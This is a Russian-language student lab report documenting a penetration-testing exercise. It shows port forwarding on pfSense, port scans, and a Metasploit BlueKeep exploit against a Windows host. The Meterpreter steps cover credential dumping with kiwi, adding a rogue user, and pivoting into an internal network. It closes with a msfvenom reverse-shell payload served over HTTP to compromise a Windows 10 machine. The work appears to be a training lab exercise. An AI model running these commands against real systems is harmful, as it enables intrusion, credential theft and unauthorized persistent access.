# Практическая работа №3 ## Инфраструктура ![](https://i.imgur.com/h0ntVtY.png) ## Выполнение заданий ### Проброс портов 445/tcp и 3389/tcp на PfSense ![](https://i.imgur.com/XEvcjA7.png) ### Сканирование #### Обычное сканирование по портам ![](https://i.imgur.com/Cg9X3Vg.png) #### Агрессивное сканирование по портам ![](https://i.imgur.com/34hbsNZ.jpg) ### Metasploit Framework ``` msfconsole search bluekeep use 1 set rhost 192.168.28.130 show targets ``` ![](https://i.imgur.com/hztThxB.png) ``` set target 8 run ``` ![](https://i.imgur.com/wKdhMhz.png) ### Payload Meterpreter #### Скриншот ``` screenshare ``` ![](https://i.imgur.com/XqyNFwd.png) #### Все учетные записи ``` load kiwi creds_all ``` ![](https://i.imgur.com/MeAveOv.png) #### Создание нового пользователя ``` bg use post/windows/manage/add_user sessions sessions 1 run getgui -u Nikita -p Pass ``` ![](https://i.imgur.com/TzfZ6n3.png) #### Выполнить проксирование трафика во внутреннюю инфраструктуру ``` portfwd add -L 192.168.28.129 -l 2323 -p 443 -r 192.168.1.1 ``` ![](https://i.imgur.com/LS0MTz7.png) ![](https://i.imgur.com/jivviSP.png) ### Взлом Win10 ![](https://i.imgur.com/HZnMukN.png) ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -f exe -o payload_1.exe python -m SimpleHTTPServer 80 ``` ![](https://i.imgur.com/NKRmBBn.png) ``` msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 run ``` ![](https://i.imgur.com/UgxStBZ.png)